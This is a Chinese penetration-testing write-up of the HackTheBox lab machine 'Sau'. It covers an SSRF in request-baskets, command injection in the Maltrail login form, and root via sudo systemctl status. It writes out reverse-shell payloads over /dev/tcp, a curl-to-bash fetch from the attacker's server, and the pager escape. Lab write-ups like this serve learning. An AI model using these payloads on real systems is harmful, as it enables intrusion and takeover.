[渗透测试学习] Sau - HackTheBox

发布时间:2023年12月18日

首先是信息搜集,nmap扫一下

nmap -sV -sC -p- -v 10.10.11.224 

在这里插入图片描述发现存在两个端口,55555端口有http服务,访问一下
在这里插入图片描述
获得线索request-baskets版本为1.2.1,搜索发现存在漏洞
在这里插入图片描述那么我们试试构造ssrf,create的时候bp抓包
构造参考

在这里插入图片描述直接访问http://10.10.11.224:55555/exp即可
(不过只是执行了url请求,没有内容。要想有内容把proxy_response设置为true就行)

我们这里直接按照步骤来(不抓包)
在这里插入图片描述
创建后打开点击设置,写入ssrf的url
在这里插入图片描述然后访问给的路径即可
在这里插入图片描述
发现是Maltrail服务,还有版本号0.53
参考文章

/login路径下存在远程执行漏洞,构造如下

username=;`bash%20-i%20%3E&%20/dev/tcp/10.10.14.32/1028%200%3E&1`

不过没弹成功,换成curl去弹
在本地创建shell.sh,写入

bash -i >& /dev/tcp/10.10.14.32/1028 0>&1

开启服务器

python3 -m http.server 80

然后nc开启监听,bp构造payload

username=;`curl 10.10.14.32/shell.sh|bash`

在这里插入图片描述成功反弹shell,找到user的flag
在这里插入图片描述

我们ls看一下发现有conf配置文件
在这里插入图片描述我们cat一下,得到信息admin和local的密码
在这里插入图片描述
sha256解密发现就是注释给的

在这里插入图片描述我们查看下能用的命令

sudo -l

在这里插入图片描述发现有/usr/bin/systemctl status trail.service可以用,搜一下相关提权方式
在这里插入图片描述用第三个(多简单)
先提升交互权限

python3 -c 'import pty;pty.spawn("/bin/bash")'

然后执行

sudo systemctl status trail.service

再输入!sh得到root权限
在这里插入图片描述得到root的flag
在这里插入图片描述

文章来源:https://blog.csdn.net/m0_73512445/article/details/135002766
本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。